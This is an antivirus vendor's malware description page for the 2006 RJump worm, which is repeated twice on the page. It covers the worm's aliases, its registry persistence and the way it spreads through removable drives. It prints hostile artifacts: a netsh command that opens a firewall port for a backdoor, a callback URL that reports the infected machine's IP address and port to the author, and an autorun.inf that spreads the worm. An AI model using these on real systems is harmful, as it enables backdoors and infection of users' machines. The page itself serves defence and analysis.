McAfee > Theat Center > Virus Detail Page

Overview

-- Update October 17, 2006 --
W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089

W32/Rjump.worm is a worm written using the Python scripting language and was converted into a windows portable executable file using the Py2Exe tool.  It attempts to spread by coping itself to mapped and removable storage drives and also opens a backdoor on an infected system.

Aliases

• Backdoor.Rajump (Symantec)

• W32/Jisx.A.worm (Panda)

• W32/RJump-C (Sophos)

• W32/RJump.A!worm (Fortinet)

• Win32/RJump.A (ESET)

• Win32/RJump.A!Worm (CA)

• Worm.RJump.A (BitDefender)

• Worm.Win32.RJump.a (Kaspersky)

• Worm/Rjump.E (Avira)

• WORM_SIWEOL.B (TrendMicro)

Characteristics

-- Update October 17, 2006 --
W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089

Upon execution, it creates a copy of itself into the windows system directory:

• %Windir%\RAVMON.EXE

Also create a non-malicious "RavMonLog" file that contains the port number on which its backdoor component listens.

Adds the following values to the registry to auto start itself when Windows starts.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"RavAV" = "%Windir%\RAVMON.EXE"

Symptoms

W32/Rjump.worm creates a port exception for its backdoor component to bypass the built-in firewall of WinXp by executing the following netsh command.

%Windir%\%Sysdir%\cmd.exe /c netsh firewall add portopening TCP 16942 NortonAV

Note: The backdoor port opened is randomly chosen.

Posts ip address and backdoor port information from an infected machine back to the virus author via the following URL:

• http://natrocket.9966.[Removed]:5288/iesocks?peer_id=%s&port=%s&type=%s&ver=4sD
  

Method of Infection

W32/Rjump.worm lists all mapped and removable storage drives on an infected system and drops the following files onto the root folder of the available drive:

• autorun.inf    --> used to autorun the worm when the drive is accessed
• msvcr71.dll  --> Clean Microsoft Visual Studio dll file
• ravmon.exe  --> copy of the worm

The contents of the autorun.inf are as follows:

[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=Auto

Infection occurs when a removable storage device or a mapped drive hosting a copy of W32/Rjump.worm is accessed and the user agrees to the auto run prompt for execution of the worm.

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Stinger:

A Stinger Standalone removal tool has been released to assist in repairing this threat.

Variants

Variants

N/A

All Information

Overview -

-- Update October 17, 2006 --
W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089

W32/Rjump.worm is a worm written using the Python scripting language and was converted into a windows portable executable file using the Py2Exe tool.  It attempts to spread by coping itself to mapped and removable storage drives and also opens a backdoor on an infected system.

Aliases

• Backdoor.Rajump (Symantec)

• W32/Jisx.A.worm (Panda)

• W32/RJump-C (Sophos)

• W32/RJump.A!worm (Fortinet)

• Win32/RJump.A (ESET)

• Win32/RJump.A!Worm (CA)

• Worm.RJump.A (BitDefender)

• Worm.Win32.RJump.a (Kaspersky)

• Worm/Rjump.E (Avira)

• WORM_SIWEOL.B (TrendMicro)

Characteristics

Characteristics -

-- Update October 17, 2006 --
W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089

Upon execution, it creates a copy of itself into the windows system directory:

• %Windir%\RAVMON.EXE

Also create a non-malicious "RavMonLog" file that contains the port number on which its backdoor component listens.

Adds the following values to the registry to auto start itself when Windows starts.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"RavAV" = "%Windir%\RAVMON.EXE"

Symptoms

Symptoms -

W32/Rjump.worm creates a port exception for its backdoor component to bypass the built-in firewall of WinXp by executing the following netsh command.

%Windir%\%Sysdir%\cmd.exe /c netsh firewall add portopening TCP 16942 NortonAV

Note: The backdoor port opened is randomly chosen.

Posts ip address and backdoor port information from an infected machine back to the virus author via the following URL:

• http://natrocket.9966.[Removed]:5288/iesocks?peer_id=%s&port=%s&type=%s&ver=4sD
  

Method of Infection

Method of Infection -

W32/Rjump.worm lists all mapped and removable storage drives on an infected system and drops the following files onto the root folder of the available drive:

• autorun.inf    --> used to autorun the worm when the drive is accessed
• msvcr71.dll  --> Clean Microsoft Visual Studio dll file
• ravmon.exe  --> copy of the worm

The contents of the autorun.inf are as follows:

[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=Auto

Infection occurs when a removable storage device or a mapped drive hosting a copy of W32/Rjump.worm is accessed and the user agrees to the auto run prompt for execution of the worm.

Removal -

Removal -

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Stinger:

A Stinger Standalone removal tool has been released to assist in repairing this threat.

Variants

Variants -

N/A